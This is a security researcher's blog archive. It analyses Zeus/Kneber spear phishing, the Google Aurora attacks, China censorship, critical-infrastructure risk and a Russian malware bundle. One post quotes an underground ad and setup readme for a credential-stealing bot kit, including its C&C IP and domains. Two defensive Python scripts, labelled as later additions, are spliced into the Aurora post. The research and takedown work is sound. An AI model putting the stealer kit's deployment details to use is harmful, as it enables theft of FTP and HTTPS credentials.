Posts by nart

The “Kneber” Botnet, Spear Phishing Attacks and Crimeware



After I received an email from Jeff Carr warning about a spoofed email containing malware, I asked Jeff to send it along. It turns out that the attackers also used portions of a blog post by Brian Krebs as a lure. What is interesting is that the attack targeted .mil and .gov email addresses using text from Carr and Krebs about an earlier attack targeting .mil and .gov email addresses. A quick analysis of the sample indicated that it was Zeus and was beaconing to a known Zeus command and control server. However, the interesting part, for me, is what happened after the machine was compromised by Zeus, and I really have to thank Jeff for passing along the email because it led me to this stuff.

Around the same time news of the Kneber botnet broke and Netwitness linked the two attacks together. While much of the coverage of Kneber was hype-filled, the actual report by Netwitness is excellent and you can get a hype-free overview by Alex Cox, the guy who discovered it, here. The response of some of the AV vendors has been troubling. Essentially some said that this is nothing new, it’s just Zeus, and that there’s long been AV protection for Zeus. Netwitness responded, stating that many AV products actually did not detect the samples they analyzed.

For the sample I analyzed, detection coverage was 18/41 on VirusTotal.

The main issue for me was the use of Zeus to drop malware focused on document removal, and that it was used in conjunction with spear phishing attacks on .mil/.gov email addresses. This second drop was 5/41 on VirusTotal.

From the data it seems like the attackers were capturing whatever they could, not retrieving specific documents. That said, they managed to compromise the types of people they appeared to be after (in terms of who the phishing mails were sent to) and in a few cases managed to get some very interesting documents.

I think the broader issue is what Brian Krebs alluded to in the comments section of his blog – and Netwitness indicated this as well — that is, if we believe that these crimeware types are squeezing all the monetary value they can out of their operations, what would they do with the type of information that has intelligence value but is not easily monetized in a traditional sense? And how better to obscure attribution than to use existing crimeware infrastructure for what appears to be more espionage than traditional crime?

I am keeping these as open questions because I am not sure how strong the connection is and tend to be cautious on these issues. But I do think it is an interesting case.

Read the full post here and here.

UPDATE: I’ve copied the report into this post.

Decrypting the Google statement



There have been many articles saying that Google is pulling out of China. Well, that’s not exactly what Google said.

Here is exactly what Google stated:

We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

Google is not leaving China. At least not yet.

Look at what was actually said:

1) Google is not willing to censor, so Google will 2) engage in discussion with the Chinese government 3) in order to operate an uncensored search engine within the law.

Law is the key word here. China’s Foreign Ministry spokesperson, Jiang Wu, stated:

China welcomes international Internet companies to conduct business within the country according to law

The question is, what law says that Google cannot index the BBC News web site? Anyone know?

In 2006 when Google started censoring google.cn in China I asked:

What specific law or court order is being complied with in China?

It is 2010, still no answer.

I think it is a reasonable question for Google to ask.

Chatter…



This post is my analysis of publicly available information on the attack against Google. I think that Google linked to my blog and the GhostNet report because of similarities in methods, not because the two cases are linked. This post combines my analysis of Google’s statement, media reports and my experience with other attacks — that doesn’t mean that this is exactly what happened in the attack on Google.

There’s been a lot of chatter about how Google and 30+ other companies were compromised. Adobe has issued a statement saying that they too were compromised, but they still won’t say if the attacks are in fact linked. Yahoo! stated that they were “aligned with Google” and it is now being reported that Yahoo! was among the other unnamed victims in the attack.

The timing of the compromise is interesting because it coincides with a 0day vulnerability in Adobe Reader. It has been suggested that this was the attack vector. The coincidence is interesting and I think that this claim is fairly credible.

UPDATE: McAfee reports that the compromise was an Internet Explorer 0day:

Our investigation has shown that Internet Explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7. Still, so far the attacks we’ve seen using this vector have been focused on Internet Explorer 6. Microsoft has been working with us on this matter and we thank them for their collaboration.

While we have identified the Internet Explorer vulnerability as one of the vectors of attack in this incident, many of these targeted attacks often involve a cocktail of zero-day vulnerabilities combined with sophisticated social engineering scenarios. So there very well may be other attack vectors that are not known to us at this time. That said, contrary to some reports our findings to date have not shown a vulnerability in Adobe Reader being a factor in these attacks.

iDefense has stated that they were able to investigate these attacks since some of their customers were also hit:

IDefense was called in to help some of the victim companies that Google had uncovered. According to Jellenc, the hackers sent targeted e-mail messages to victims that contained a malicious attachment containing what’s known as a zero-day attack. These attacks are typically not detected by antivirus vendors because they exploit a previously unknown software bug.

“There is an attack exploiting a zero-day vulnerability in one of the major document types,” Jellenc said. “They infect whichever users they can, and leverage any contact information or any access information on the victim’s computer to misrepresent themselves as that victim.” The goal is to “infect someone with administrative access to the systems that hold the intellectual property that they’re trying to obtain,” he added.

The attack vector is very similar to GhostNet, but it is a very common form of attack. Mikko Hypponen (who is awesome) told the BBC:

“This wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly,” said Mikko Hypponen, of security firm F-Secure.

“Most companies just never go public,” he added.

“Human-rights activists are the biggest target,” said Mr Hypponen. “Everyone from Freedom for Tibet to Falun Gong supporters and those involved in Liberation of Taiwan are hit.”

I tend to agree. It is not the method of attack that is the story here; it’s the high profile of the victims, the public disclosure by Google, and Google’s decision to challenge China’s censorship that have made it so interesting. Really, we investigate these kinds of attacks (usually on human rights activists) all the time.

In short, a user receives an email, possibly appearing to be from someone they know who is a real person within their organization, with some text — sometimes specific, sometimes generic — that urges the user to open an attachment (or visit a web site). The attachment is usually a PDF or Word document, but other document types are also common. If the user opens that attachment with a vulnerable version of Adobe Reader or Microsoft Office, their computer will be compromised. Antivirus detection for these documents is usually relatively low, and if the exploit is a 0day — an exploit for which there is no fix from the vendor available — the chances of compromise are very good.

After the user’s computer is compromised it “checks in” with a command and control server (C&C). These days it is most common for this check-in to be an HTTP connection — it often looks like just another visit to a website — in which the compromised computer sends some information, usually an IP address, operating system, etc., and receives a command which it then executes. From there the attacker has full control of the system. The attacker can steal documents, email, etc., force the compromised computer to download additional malware, and use the infected computer as a mechanism to exploit its owner’s contacts or other computers on the network.
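The check-in pattern just described is what a defender can hunt for: a single HTTP request is indistinguishable from browsing, but a series of small requests to one host at a near-constant interval is not. The following script is an added example (not from the original post) that flags such series in a web proxy log; the log format, client addresses and destination hostname are all constructed for the example.

```python
"""Flag periodic HTTP 'check-ins' in a web proxy log.

Compromised hosts that beacon to a C&C server over HTTP look like
ordinary web visits one request at a time. The regularity of the
interval and the small response size are what stand out, so this
script groups requests by (client, destination host) and flags pairs
whose inter-request gaps are numerous and nearly constant.

Log format below is constructed for this example (not from the post):
    <ISO timestamp> <client_ip> <method> <url> <status> <bytes>
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlparse

# Constructed sample log: 10.0.0.7 checks in to a made-up C&C host every
# ~300 s (with a few seconds of jitter); 10.0.0.9 browses normally.
SAMPLE_LOG = """\
2010-01-14T09:00:00 10.0.0.7 POST http://update-check.example.net/in.php 200 312
2010-01-14T09:00:11 10.0.0.9 GET http://news.example.org/ 200 48210
2010-01-14T09:05:02 10.0.0.7 POST http://update-check.example.net/in.php 200 315
2010-01-14T09:06:40 10.0.0.9 GET http://news.example.org/world 200 51032
2010-01-14T09:09:59 10.0.0.7 POST http://update-check.example.net/in.php 200 310
2010-01-14T09:15:01 10.0.0.7 POST http://update-check.example.net/in.php 200 313
2010-01-14T09:17:25 10.0.0.9 GET http://news.example.org/ 200 48300
2010-01-14T09:20:03 10.0.0.7 POST http://update-check.example.net/in.php 200 311
2010-01-14T09:24:58 10.0.0.7 POST http://update-check.example.net/in.php 200 314
2010-01-14T09:44:12 10.0.0.9 GET http://news.example.org/sport 200 60120
"""


def parse_log(text):
    """Yield (timestamp, client_ip, dest_host, bytes) for each log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status, size = line.split()
        yield datetime.fromisoformat(ts), client, urlparse(url).hostname, int(size)


def find_beacons(text, min_requests=5, max_cv=0.05, max_bytes=1024):
    """Return [(client, host, mean_gap_seconds, request_count)] for request
    series that look like check-ins: at least min_requests small responses
    whose gaps have a coefficient of variation (stdev/mean) <= max_cv."""
    series = defaultdict(list)
    for ts, client, host, size in parse_log(text):
        if size <= max_bytes:          # check-ins carry little data
            series[(client, host)].append(ts)

    flagged = []
    for (client, host), times in series.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m else float("inf")
        if cv <= max_cv:
            flagged.append((client, host, round(m), len(times)))
    return flagged


if __name__ == "__main__":
    for client, host, gap, n in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {host}: {n} requests, ~{gap}s apart")
```

Tune `min_requests`, `max_cv` and `max_bytes` to the log volume; legitimate software updaters also beacon regularly, so flagged pairs are leads for review, not verdicts.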

One of the things I like to track closely is the network infrastructure of the attackers — the location of their command and control servers as well as the mechanism of communication and other properties of the malware that allow seemingly disparate attacks to be linked together. There has been some information published about the command and control servers used in the Google attack. James Mulvenon, who really knows his stuff, stated that the C&Cs were in Taiwan and the drop site for the stolen data was on a US IP:

The attacks appear to have been launched from at least six Internet addresses located in Taiwan, which is a common strategy used by Chinese hackers to mask their origin, said James Mulvenon, director of the Center for Intelligence Research and Analysis at Defense Group Inc. a national-security firm.

They also hijacked the Internet address of a San Antonio-based firm, Rackspace, which is one of the largest Internet-hosting companies in the U.S. They siphoned off the stolen data from Google and other companies to the San Antonio site before sending it overseas, Mr. Mulvenon said. A Rackspace official said, “A server at Rackspace was compromised, disabled, and we actively assisted in the investigation of the cyber attack, fully cooperating with all affected parties.”

In addition, a dynamic DNS service was reportedly used:

iDefense obtained samples of the malicious code used in the July attack and the more recent one and found that although the malware was different in the two attacks, the programs both communicated with similar command-and-control servers. The servers each used the HomeLinux DynamicDNS to change their IP address, and both currently pointed to IP addresses belonging to a subset of addresses owned by Linode, a US-based company that offers Virtual Private Server hosting.

“The IP addresses in question are . . . six IP addresses apart from each other,” iDefense said in its statement. “Considering this proximity, it is possible that the two attacks are one and the same, and that the organizations targeted in the [recent] Silicon Valley attacks have been compromised since July.”

UPDATE: Apparently one of the pieces of malware used was the Hydraq Trojan.
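Linking attacks through their infrastructure, as described above (C&C hostnames under one dynamic DNS service, C&C addresses a few IPs apart on one provider), can be done mechanically once the indicators are tabulated. This added example, not from the original post or from iDefense, clusters sample records by those two relations with a union-find; the sample names, hostnames, IPs and the set of dynamic DNS parent domains are all constructed assumptions.

```python
"""Link malware samples through shared command-and-control infrastructure.

Two records are related when their C&C hostnames sit under the same
dynamic DNS parent domain, or when their resolved C&C IPs are within
IP_DISTANCE addresses of one another (the post quotes two C&C servers
"six IP addresses apart" on one hosting provider). Related records are
merged into clusters with a union-find.

All sample ids, hostnames, IPs and the DYNDNS_PARENTS set below are
constructed for this example.
"""
import ipaddress

IP_DISTANCE = 8     # treat addresses this close as one hosting block

# Parent domains treated as dynamic DNS services (assumption for this example).
DYNDNS_PARENTS = {"homelinux.example", "dyn.example"}

# Constructed records: (sample_id, c2_hostname, resolved_ip, first_seen)
SAMPLES = [
    ("sample-A", "svc1.homelinux.example", "203.0.113.10", "2009-07"),
    ("sample-B", "svc2.homelinux.example", "203.0.113.16", "2009-12"),
    ("sample-C", "cdn.dyn.example",        "198.51.100.5", "2009-12"),
    ("sample-D", "static.example.com",     "198.51.100.7", "2009-11"),
    ("sample-E", "other.example.org",      "192.0.2.44",   "2009-10"),
]


def parent_domain(host):
    """Return the parent domain (last two labels) of a hostname."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def related(a, b):
    """True if two records share a dynamic DNS parent domain or their
    C&C IPs lie within IP_DISTANCE of each other."""
    pa, pb = parent_domain(a[1]), parent_domain(b[1])
    if pa == pb and pa in DYNDNS_PARENTS:
        return True
    ia, ib = ipaddress.ip_address(a[2]), ipaddress.ip_address(b[2])
    return ia.version == ib.version and abs(int(ia) - int(ib)) <= IP_DISTANCE


def cluster(samples):
    """Union-find over all pairs; returns a sorted list of sorted
    lists of sample ids, one list per infrastructure cluster."""
    parent = {s[0]: s[0] for s in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    for i, a in enumerate(samples):
        for b in samples[i + 1:]:
            if related(a, b):
                parent[find(a[0])] = find(b[0])

    groups = {}
    for s in samples:
        groups.setdefault(find(s[0]), []).append(s[0])
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    for group in cluster(SAMPLES):
        print(", ".join(group))
```

Proximity on a shared hosting provider is circumstantial (unrelated customers get adjacent addresses too), so a cluster is a hypothesis to test against other malware properties, not proof of a single actor.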

And what did the attackers steal? Google stated that there was “theft of intellectual property”; some suggest that the attackers stole source code:

But according to iDefense, whose customers include some of the 33 companies that were hacked, the attacks were well targeted and “unusually sophisticated” and aimed at grabbing source code from several hi-tech companies based in Silicon Valley as well as financial institutions and defense contractors.

However, Google stated that the “primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” and that the attack was partially successful:

Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Others state that Google’s internal intercept systems were attacked:

That’s because they apparently were able to access a system used to help Google comply with search warrants by providing data on Google users, said a source familiar with the situation, who spoke on condition of anonymity because he was not authorized to speak with the press. “Right before Christmas, it was, ‘Holy s***, this malware is accessing the internal intercept [systems],’” he said.

Now some people have come forward, a Tibetan activist for example, saying that their email accounts had been breached.

Who is behind the attacks? Google didn’t really say who was behind the attacks. iDefense, who may be overreaching here, stated that it was the “Chinese state”:

“We confirmed with some clients and partners of ours in the defense contracting community that the IP addresses used to launch the attacks are known to be associated with previous attacks from groups that are either directly employed agents of the Chinese state or amateur hackers that are proxies for them that have attacked other U.S. companies in the past.”

In fact, attribution in these sorts of attacks is very difficult. Often people rely on the geolocation of an IP address — that’s not good enough. In this case the C&Cs were apparently in Taiwan and the drop site in the US. What does that tell us? By piecing together seemingly disparate bits of information over time it is possible to make an educated guess. What makes the process difficult and tenuous is that the attackers might be quite different persons from those who ultimately exploit the data the attackers gather. It is the interpretation of the political dimensions of the attack that leads to a determination of who might ultimately have benefited the most from the attack, not technical evidence. Therefore there is room for a lot of uncertainty.

Google’s New Approach



Google has just announced that there were successful attacks against their infrastructure resulting in the theft of intellectual property. Google traced the attacks to China and, although the attribution regarding the Chinese government is unclear, Google also discovered that the attackers attempted to compromise the Gmail accounts of Chinese human rights activists.

But the most interesting result is that, due to the combination of attacks, surveillance and censorship, Google has decided to reassess their operations in China:

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Wow.

The connection between censorship, surveillance and attacks is the key. Censorship, such as the blocking of web sites, is fairly crude but effective when combined with targeted surveillance and attacks. While many, especially the technically savvy, can circumvent China’s filtering system, the “GFW”, using tools such as Psiphon and Tor, most Chinese citizens do not. The GFW doesn’t have to be 100% technically effective; it just has to serve as a reminder to those in China about what content is acceptable and what should be avoided. The objective is to influence behaviour toward self-censorship, so that most will not actively seek out banned information or the means to bypass controls and access it.

The nexus of censorship, surveillance and malware attacks is the key to China’s information control policies. It is not just about the GFW. Internet users in China face complex threats, including targeted attacks and surveillance, that are heavily dependent on additional factors such as involvement in political activities. China chooses when, where and how to exercise this granular control.

The InfoWar Monitor — which is a partnership between the Citizen Lab, Munk Centre for International Studies, University of Toronto and The SecDev Group (and SecDev.cyber which focuses on Internet threats) — has been focusing on these threats. For example, in a report “Breaching Trust: An analysis of surveillance and security practices on China’s TOM-Skype platform” we documented how Tom-Skype (the Chinese version of Skype) was censoring and capturing politically sensitive content. In “Tracking GhostNet: Investigating a Cyber Espionage Network” we documented targeted malware attacks that compromised over 1,295 computers in 103 countries, 30% of which were high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

Google’s decision to reassess their operations in China is courageous. I strongly hope that Microsoft, Yahoo! and others follow Google’s lead — as, to their credit, they have done in the past. In “Search Monitor Project: Toward a Measure of Transparency” I compared the censorship practices of Google, Yahoo! and Microsoft as well as the domestic Chinese search engine Baidu and found that all followed Google’s lead to some extent by at least disclosing their censorship practices to their users. I hope that they stand by Google.

China, the ball is in your court.

Malware Market



It’s no surprise that there is a malware market, an ecosystem of buyers, sellers and middlemen known as “guarantors”. In a very interesting post, “The botnet ecosystem”, Vitaly Kamluk explains the way in which this system works. There is a malware market in which malicious code and services are exchanged with the help of trusted third parties — usually administrators of popular forums. In addition, compromised hosts and stolen credentials are also exchanged.

Here’s a microcosm of this ecosystem that I stumbled upon recently. A member of a forum (forum.inattack.ru) called “Brainy” posts an ad for a bot system that steals FTP and HTTPS credentials:


Here’s the Google translate version of a post by “brainy”:

[brainyframer], bot freymer \ Gruber \ sniffer
20.11.2009, 2:06

I offer you a bot freymer / sniffer / Graber my production [BrainyFramer]
This bot will be a good assistant to many who are professionally engaged cores.

Functional:
Graber-21 FTP client
FTP-sniffer with 37 different clients (web browsers including)
-HTTPS formgraber for IE (5,6,7,8) and FF. For snifa panel hosting (~ 120 different hosts)
-Freymer Semiconductors, distributed processing your list of FTP bots. High speed. Frame akov from the bot after snifa. Removal of foreign code.

Admin at work:
Screen

Progruzheno loader for 100 cars
Article: How to see otstuk 75%
Palimost build in test 4 AB.

____________________________

Price build: 400vmz
____________________________

[!] Everyone who bought a free upgrade.
[!] Change link for free.
[!] Questions, setting free too (IMG: http://html.forum.web-hack.ru/emoticons/smile.gif)
[!] Soft palitsya. I do not crypt. I give the contact person who does it.
[!] On Vista and windows 7 is not working.
————————————————– ———–

Answers to frequently asked questions:
——
Question: What palitsya. Traverses a firewall?
A: Soft works in the context of web browsers and FTP client system. If these applications have access to the network, the bot will work.
—–
Q: Why do little in the FTP log
Answer: It depends on your downloads. With 1K purchased downloads usually goes akkov 20-100. 0.5-1K Semiconductors with 1K of purchased downloads is a myth.
If you download from the dor. traffic Kay “download ftp client” then you understand that the FTS in the log will be more.
—–
Q: What about an exchange for …?
Answer: No, I do not need anything except money.
—–
Question: Is it possible to test?
Answer: I have no desire and time to make someone test. Soft checked in not only me alone.
—–

Asya> 3_5266891_7


A forum administrator vouches for brainy, acting as the trusted middleman or “guarantor”. Here’s the Google translate version:

Take this software is already long enough. All the alleged author of the software options – do. The author – an appropriate person with whom pleasant girl. Update issued on a regular basis. In general – I recommend.

On a server hosting some other nasty stuff including the Liberty exploit kit I found Brainy’s kit:

IP: 210.51.166.220

Domains:

bale.ws
ciao.ws
prefix.ws
hzone666.cn

Here is the readme file that comes with the bot:

Scripts for [BrainyFramer]

0. conf.php – Database settings and working links
1. create.php – Creates the table
3. get.php – Gives the bot its settings.
4. check.php – Admin panel
5. list.txt – List of FTP accounts
6. \logs\ftp.log – FTP log (permissions 755)
7. \logs\https.log – HTTPS log (permissions 755)
8. grab.dll – Grabber module, do not touch!

How to install these scripts?
——————————–
-Set up the folder so that search engine bots do not crawl our files)
-Create a database for them, enter the database settings, and also set the login and password for the admin panel.
-Run create.php; if everything is OK with the settings, the message “Таблицы созданы” (“Tables created”) will appear
-Upload the list of FTP accounts (the list must be in plain text format) to the server in the folder with the scripts, and enter the file name of the list (list.txt by default) in conf.php
——————————–

(с) Brainy 352668917

Google translate:

Scripts for [BrainyFramer]

0. conf.php – Base settings and working links
1. create.php – Creates a table
3. get.php – Gives the bot settings.
4. check.php – Admin
5. list.txt – List of Semiconductors
6. \ logs \ ftp.log – log c Semiconductors (Law 755)
7. \ logs \ https.log – log c https (Law 755)
8. grab.dll – Module Graber, do not touch!

How to install these scripts?
——————————–
-Makes setting up a folder to search bots did not run on our files)
-Creating a database for them, write the base configuration, is also asking login and pass on the admin panel.
Run-create.php, if everything is OK with the settings, it will be marked “Table created”
-Load the list of FTP akkov (list must be in plain text. Format) on the server in the folder with the script, the file name from the list (poumolchaniyu list.txt) write in conf.php
——————————–

(c) Brainy 352668917


Today the list.txt (which contains compromised FTP accounts) has 528 entries. This list has varied over time, at one point swelling to 100,000 entries, although many were duplicates. Also, many accounts were taken from public postings of compromised FTP accounts. (Nov 1 – 23632 entries in list.txt, Nov 15 – 100000 entries in list.txt).

The ftp.log file, which holds the FTP credentials that this instance of the BrainyFramer kit has captured, contains 1684 entries. Many are local accounts, anonymous accounts and so on. The 528 entries in list.txt appear to be a cleaned-up version of the entries in ftp.log.

The most interesting file is https.log which contains credentials captured from HTTPS sessions. This file is 2.8 MB and contains credentials captured from 2059 unique IP addresses.


Credentials were captured for users with accounts on 125 sites:


The .ws registrar has suspended the domain names, the Chinese CERT appears to have taken action against the command and control server residing in their IP space, and AusCERT has been a great help with notification. (And thanks to Jose Nazario too).

Thoughts on Critical Infrastructure Protection



In a very interesting paper for the International Risk Governance Council, Ortwin Renn describes a framework that provides an “analytic structure for investigating and supporting the treatment of risk issues.” Renn argues that risks are “mental ‘constructions’” in which actors link signals from the real world with “experience of actual harm” along with “the belief that human action can prevent harm in advance.” Therefore, how actors come to understand threats and risks is critical for it affects risk governance. Renn defines “risk governance” as follows:

On a national scale, governance describes structures and processes for collective decision-making involving governmental and non-governmental actors (Nye and Donahue 2000). Governing choices in modern societies is seen as an interplay between governmental institutions, economic forces and civil society actors (such as NGOs). At the global level, governance embodies a horizontally organised structure of functional self-regulation encompassing state and non-state actors bringing about collectively binding decisions without superior authority (cf. Rosenau 1992; Wolf 2002).

Renn suggests that there are four phases of risk governance: pre-assessment, appraisal, tolerability and acceptability judgement, and management. My interest at this point is in the pre-assessment phase. How do we come to understand the nature of cyber threats to critical infrastructure (CI), and how do we assess the risks they pose? Framing is a critical component of the pre-assessment phase, for it determines what information is relevant and how risk is perceived. It shapes how we come to understand the threat and indicates a direction of action.

Framing

Cyber threats, and in particular cyber threats relating to CI, have been largely framed in polar opposite extremes.

On one end of the continuum we have those who believe cyber threats to be nothing more than a nuisance. It is not uncommon to hear “our systems are well protected”, followed by “everyone gets a virus every now and then” and finally “well, our critical systems are firewalled, air-gapped, not connected to the Internet.” In this case threats are treated as “standalone” cases that are largely technical in nature.

From such a perspective, technical considerations take precedence over who might be behind the attacks, what the motivations of the attackers are, and what the consequences of cyber intrusions are — for example, what could the attackers have done with the level of access obtained, the documents stolen, and the contacts harvested? This results in underestimated risk, de-prioritization, and sometimes even inaction.

On the other side you’ll hear that China/Russia/Hackers – whatever the flavour of the day is – have thoroughly infiltrated CI and can “shut down the electrical grid” or “crash airplanes into one another” or … insert catastrophe here.

From this perspective, political persuasions concerning attribution are prioritized over technical considerations. The scenarios used to illustrate the threat are often ill-conceived and do not reflect the technical and operational environments they are meant to address. Rather than focus on “boring” details, this perspective seeks to lay blame on external sources. This results in overestimated risk, sometimes resulting in disbelief and therefore inaction, or, when it does spur action, a focus on the wrong threats.

For example, some often quote the case of the Australian sewage hacker. An attacker managed to compromise a waste management system near Brisbane, Australia and intentionally caused millions of litres of raw sewage to spill out over the suburb of Sunshine Coast. Many, including the WSJ, suggest, “what if hackers located in China or Russia were able to conduct attacks like this here?”

Well, it turns out that the “hacker” in this case was an insider: he was “employed by the company that had installed the system” that he later “hacked” and he had specialized knowledge of the system. Moreover, the attack did not occur over the Internet, in fact the attacker issued commands over radio and had to be within a 25 mile radius – something that doesn’t apply to hackers operating out of China or Russia. Security solutions focusing solely on external threats would not have protected this installation in this case.

Re-framing the problem reveals a much more complex threat landscape. CI faces “integrated threats” which encompass the intersection of cyberspace and “meatspace”. The “cyber” threat is not purely digital. Nor is the threat limited to only emergencies or catastrophic events.

CI encompasses the private and public sectors and is increasingly reliant on Internet connectivity (in some capacity). Government relies on networks operated by private firms, which contract with other private firms and so on. “Ownership” of the cyber security process is distributed across all the entities responsible for the setup and installation of these systems, through to operations and maintenance.

In addition, individual operations are reliant on others – something that the Northeast Blackout of 2003 demonstrated so vividly. The operations of Canadian CI were negatively impacted by the operations of another operator, in this case a foreign one.

This same lesson applies to cyberspace.

Therefore defence needs to be conceptualized not just in terms of firewalls and IDS but also the security of the operations at each stage (computer security, software security, the tools used during installation, remote access for maintenance, and connection from “trusted” operators) as well as the “insider” threat.

The good thing is that this re-framing is occurring. There are now a variety of public documents that serve as an early warning of the potential threat CI faces – I’ll briefly discuss two of them:

1. A report by the Department of Transportation’s Inspector General that documents a variety of attacks against and vulnerabilities in the FAA’s air traffic control system (May 2009)

2. A report commissioned by the Department of Energy investigating common cyber security vulnerabilities in control systems (November 2008)

Early Warning

The DOT Inspector General’s report documented successful attacks that have affected FAA networks. In 2006 the FAA shut down a “portion of its ATC systems in Alaska” due to a “viral attack,” and in 2008 FAA computers, again in Alaska, were compromised and 40,000 usernames and passwords were stolen. In 2009 “a FAA public-facing Web application computer” was compromised, leading to the theft of “PII on 48,000 current and former FAA employees.”

Vulnerabilities were found during an audit in various web-applications that would have allowed attackers to access the data stored on those computers – this included public facing systems such as those which list “communications frequencies for pilots and controllers” as well as internal systems used by the FAA:

  • Unauthorized access was gained to information stored on Web application computers associated with the Traffic Flow Management Infrastructure System, Juneau Aviation Weather System, and the Albuquerque Air Traffic Control Tower;
  • Unauthorized access was gained to an ATC system used to monitor critical power supply at six en route centers; and
  • Vulnerability found on Web applications associated with the Traffic Flow Management Infrastructure system was confirmed, which could allow attackers to install malicious codes on FAA users’ computers.

According to the report, “[t]his occurred because (1) Web applications were not adequately configured to prevent unauthorized access and (2) Web application software with known vulnerabilities was not corrected in a timely manner by installing readily available security software patches released to the public by software vendors.”

The report on common cyber security vulnerabilities in control systems for the DOE identified similar issues along with serious issues concerning the use of plain text communications protocols and the lack of security surrounding remote access systems. The report found:

“If compromised, an attacker could utilize these systems to cause catastrophic damage or outages directly or by exploiting paths to critical end devices or connected SCADA systems.”

Typically the network environment is divided into a “business LAN” and a “control system LAN” with a firewall in between. Sometimes a DMZ is created to share data between the corporate and control system LANs.

The report found that:

  • Firewall and router filtering deficiencies include access to control system components through external and internal networks. (Unrestricted telnet access was allowed to DMZ network equipment, VPNs were misconfigured, and remote desktop passwords were shared between security zones, i.e. the corporate and control system networks.)
  • It was possible to escalate privileges from a non-control system application remotely published by the display application to a control system application.
  • A malicious user who has physical access to an unsecured port on a network switch could plug into the network behind the firewall to defeat its incoming filtering protection.

A very interesting theme throughout the report was the focus on remote, trusted endpoints. The report found that the Inter-Control Center Communications Protocol (ICCP), “an open protocol used internationally in the electric power industry to exchange data among utilities, regional transmission operators, independent power producers, and others” uses plain text and that such connections should be treated as “untrustworthy” and placed in a separate DMZ.

In other words, operators within the industry treat remote connections between them as trustworthy, bypassing the security procedures in place. This means that even if your operation is relatively secure, an attacker may be able to bypass it by compromising a less secure peer.

Determining risk in cyberspace is difficult. Attacks occur everyday.

Attackers may be highly skilled and well resourced adversaries or simply opportunistic amateurs. Some are professional cyber criminals, others are motivated by politics or status within their community. Still others may be engaged in espionage or data theft and have ties to state governments. Attacks may be largely symbolic, intended to intimidate, or they may aim to cause disruption or destruction.

An attack that may seem insignificant may have much larger consequences.

Knowing the degree of risk posed by attackers — ascertaining the “who” and “why” — is critical for mounting an effective response. To be clear, understanding why an attack occurred should not be used as an excuse such as “why would anyone attack poor old me” to limit or restrict corrective measures. Rather, it is used to situate the attack in a broader perspective which may indicate why the target was chosen and what the attacks may aim to do with the information/data they have extracted.

Understanding a single attack is only one component of establishing a complete threat picture.

In order to develop a better understanding of the rapidly changing risks and threats in cyberspace, ongoing monitoring and analysis is required. Rather than a static assessment, or a singular incident response, such threat mapping is better conceptualized as an iterative interrogation process in which old and new data are examined for meaningful relationships and new evidence.

Cyber threats to CI exist, don’t get me wrong, but the emphasis need not be on an unlikely catastrophic event like a “cyber-Katrina,” a “cyber-9/11” or a “digital Pearl Harbor.” There are numerous vulnerabilities to be exploited, and they probably are being exploited.

The good news is that they are often remedied through the implementation of best security practices. The bad news is that “boring” security concerns do not capture the imagination of policy makers and bureaucrats responsible for committing resources to fix security issues.

Still, this is not an excuse to conjure up fiction, even if the goal is to spur corrective action in the right direction.

We need to find the right framing that captures the attention of policy makers but that accurately reflects the threats and vulnerabilities to CI.

We need to change the perception of security as something that is brought in to “fix” an emergency or as a response to catastrophe. It needs to be part of the development, implementation, and operation of CI. Considering the sorry state of affairs, I do think that scenarios can be useful tools to help policy makers understand the nature of the threat. However, they need to be realistic – they need to reflect the operational environment of CI. If they are just hype they are in the best case useless and in the worst case an actual detriment.

Adventures in Russian Malware



I just posted an analysis of a pcap file from a political figure. While I expected to find targeted malware that was possibly associated with political activities, I found a bunch of Russian/Ukrainian malware. What I found interesting, and which seems to match what key security community folks are seeing (here and here), is a “bundling” of malware. In this case, a Black Energy bot was bundled with the “Oficla/Sasfis” Trojan downloader as well as RogueAV (Win32.FakeScanti).

Another interesting issue was the use of Chinese IP addresses by the Russian malware (which, given the political figure whose computer was infected, made the Chinese IP addresses contextually relevant). This is certainly not new (see here, here etc…) but I think it drives home the point that simply relying on GeoIP to determine attribution and/or motivation is misguided.

I tried to link part of this operation to someone who appears to be some sort of “middleman” who propagates a variety of malware. There are a variety of posts on forums by “rundll32″ in which he advertises an “affiliate program” that “is not detected by any antivirus.” In the ad he uses the domain rundll32.ru which is registered to “rundll32@yandex.ru” which was also used by Alexander V. Prokhorov (or Prochorov) in a paper submitted at Moscow State University.

I find the relationships between the various groups and how different individuals and groups within the malware ecosystem get ultimately paid very interesting.

Russian Malware Bundle



by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
